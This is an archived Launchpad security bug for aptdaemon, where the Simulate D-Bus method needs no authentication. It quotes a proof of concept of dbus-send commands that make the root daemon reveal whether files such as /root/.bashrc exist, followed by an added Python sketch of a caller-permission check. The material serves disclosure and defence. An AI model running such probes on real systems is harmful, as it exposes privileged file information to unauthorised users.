[Bug 1449587] Re: Simulate dbus method doesn't require authentication
Marc Deslauriers
marc.deslauriers at canonical.com
Tue Jun 16 17:51:14 UTC 2015
** Information type changed from Private Security to Public Security
--
https://bugs.launchpad.net/bugs/1449587
Title:
Simulate dbus method doesn't require authentication
Status in aptdaemon package in Ubuntu:
Fix Released
Bug description:
Reported via email from Tavis Ormandy:
-----
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile string:/root/.bashrc \
    boolean:false
method return sender=:1.13166 -> dest=:1.13182 reply_serial=2
string "/org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13"
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt/transaction/1804d9c8373b4a00a905b029ca18ce13 \
    org.debian.apt.transaction.Simulate
Error org.debian.apt.TransactionFailed: error-invalid-package-file:
Lintian check results for /root/.bashrc:
warning: "/root/.bashrc" cannot be processed.
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt org.debian.apt.InstallFile string:/root/.bashrca \
    boolean:false
method return sender=:1.13166 -> dest=:1.13184 reply_serial=2
string "/org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430"
$ dbus-send --print-reply --system --dest=org.debian.apt \
    /org/debian/apt/transaction/1a723099a3bb446c848dfcc46d0f5430 \
    org.debian.apt.transaction.Simulate
Error org.debian.apt.TransactionFailed: error-unreadable-package-file:
/root/.bashrca
----
(mdeslaur): Not only does this expose the existence of arbitrary
files, but it actually accesses them and processes untrusted packages.
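An added example, not taken from the bug report or from aptdaemon's own fix: before a root daemon touches a caller-supplied path, it can check that the calling uid could itself read the file, and answer with one uniform error so that missing and unreadable files look the same to the caller. The function names, the error string and the mode-bit-only check (no ACLs, capabilities or LSM policy) are assumptions made for illustration.

```python
import os
import stat

DENIED = "error-not-authorized"  # hypothetical uniform error code (assumption)

def _allows(st, uid, gids, want):
    """Owner/group/other mode-bit check; `want` is an rwx mask (4, 2 or 1)."""
    shift = 6 if st.st_uid == uid else 3 if st.st_gid in gids else 0
    return ((st.st_mode >> shift) & want) == want

def caller_may_read(path, uid, gids):
    """True only if `uid` can traverse to and read the regular file `path`."""
    if not os.path.isabs(path):
        return False
    real = os.path.realpath(path)  # resolve symlinks the way the daemon would
    parts = [p for p in real.split(os.sep) if p]
    current = os.sep
    try:
        if not _allows(os.lstat(current), uid, gids, 1):
            return False
        for i, part in enumerate(parts):
            current = os.path.join(current, part)
            st = os.lstat(current)
            if i == len(parts) - 1:  # final component: regular file, readable
                return stat.S_ISREG(st.st_mode) and _allows(st, uid, gids, 4)
            if not (stat.S_ISDIR(st.st_mode) and _allows(st, uid, gids, 1)):
                return False
    except OSError:
        return False  # missing or inaccessible: same answer as "not permitted"
    return False

def simulate_request(path, uid, gids):
    """Gate placed in front of a Simulate-style handler (sketch, not aptdaemon)."""
    if not caller_may_read(path, uid, gids):
        return DENIED  # no distinction between nonexistent and unreadable
    # The privileged processing of the package file would start only here.
    return "simulated"
```

This is a pre-check only: the path can change between the check and the later open, so a daemon would still need to open the file safely and confirm what it opened.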